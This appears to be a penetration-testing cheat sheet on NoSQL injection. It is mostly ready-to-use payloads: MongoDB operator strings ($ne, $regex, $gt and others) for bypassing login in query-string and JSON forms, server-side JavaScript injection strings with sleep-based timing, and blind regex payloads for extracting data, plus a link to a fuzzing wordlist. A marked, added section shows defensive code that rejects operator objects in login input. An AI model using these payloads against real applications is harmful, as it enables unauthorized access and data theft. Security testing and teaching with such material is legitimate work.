# NoSQL injection (NoSQLi)

## Authentication bypass

### Query string <a href="#authentication-bypass-query-string" id="authentication-bypass-query-string"></a>

```sh
username[$ne]=noexiste&password[$ne]=noexiste
username[$regex]=.*&password[$regex]=.*
username[$gt]=&password[$gt]=
username[$gte]=&password[$gte]=
username[$nin][]=noexiste&password[$nin][]=noexiste
username[$exists]=true&password[$exists]=true
```

* $ne = not equals.
* $regex = match a specified RegEx.
* $gt = greater than.
* $gte = greater than or equal to.
* $nin = not in the specified array.
* $exists = matches documents where the field is present (true) or absent (false).

### JSON <a href="#authentication-bypass-json" id="authentication-bypass-json"></a>

```json
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "noexiste"}, "password": {"$ne": "noexiste"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
```

* $ne = not equals.
* $gt = greater than.
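
The query-string and JSON payloads above only work when the handler copies a parsed object straight into the database filter. The following added example (not part of the original page) contrasts that pattern with a type-checked one; the function names, the 256-character cap and the sample bodies are hypothetical and constructed here.

```javascript
// Added example; all function names are hypothetical, not from a real library.

// Collect every key MongoDB would treat as an operator ("$ne") or dotted path.
function findOperatorKeys(value, path = "") {
  if (value === null || typeof value !== "object") return [];
  const hits = [];
  for (const [key, child] of Object.entries(value)) {
    const here = path ? `${path}.${key}` : key;
    if (key.startsWith("$") || key.includes(".")) hits.push(here);
    hits.push(...findOperatorKeys(child, here));
  }
  return hits;
}

// Vulnerable pattern: parsed input is copied into the filter, so an object
// such as {"$ne": null} is evaluated as an operator, not compared as a value.
function buildLoginFilterUnsafe(body) {
  return { username: body.username, password: body.password };
}

// Hardened pattern: both credentials must be plain strings (256 is an assumed
// cap). Only the username reaches the query, pinned with $eq; the password is
// returned for hash verification in application code, not matched by the DB.
function buildLoginFilter(body) {
  const fields = { username: body?.username, password: body?.password };
  for (const [name, value] of Object.entries(fields)) {
    if (typeof value !== "string" || value.length === 0 || value.length > 256) {
      return {
        ok: false,
        reason: `${name} must be a non-empty string`,
        operators: findOperatorKeys({ [name]: value }), // for logging/alerting
      };
    }
  }
  return { ok: true, filter: { username: { $eq: fields.username } }, password: fields.password };
}

// Constructed samples: the page's payloads as a bracket-aware query parser or
// JSON body parser would hand them to the route handler, plus one normal login.
const SAMPLES = [
  { username: { $ne: "noexiste" }, password: { $ne: "noexiste" } },
  { username: { $regex: ".*" }, password: { $regex: ".*" } },
  { username: "alice", password: "correct horse" },
];

for (const body of SAMPLES) {
  console.log(JSON.stringify(body), "->", JSON.stringify(buildLoginFilter(body)));
}
```

The `operators` list in a rejected result names the injected keys, which makes it a useful field to log when alerting on login attempts.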

### Server-Side JavaScript Injection (SSJI) <a href="#authentication-bypass-server-side-javascript-injection-ssji" id="authentication-bypass-server-side-javascript-injection-ssji"></a>

```javascript
" || true || ""=="
' || true || ''=='
" && (sleep(5000)) || ""=="
' && (sleep(5000)) || ''=='
```

## Data exfiltration

```sh
param[$ne]=noexiste
param[$regex]=.*
param[$gt]=''
param[$gte]=''
param[$lt]='~'
param[$lte]='~'
```

### Blind <a href="#data-exfiltration-blind" id="data-exfiltration-blind"></a>

```sh
# query string
param[$regex]=^XYZ.*$
# JSON
{"param":{"$regex":"^XYZ.*$"}}
```

### Server-Side JavaScript Injection (SSJI) <a href="#data-exfiltration-side-javascript-injection-ssji" id="data-exfiltration-side-javascript-injection-ssji"></a>

```javascript
" || (this.param.match('^XYZ.*')) || ""=="
" || (this.param.match('^XYZ.*')) && (sleep(5000)) || ""=="
```

## Wordlists

* <https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/Databases/NoSQL.txt>
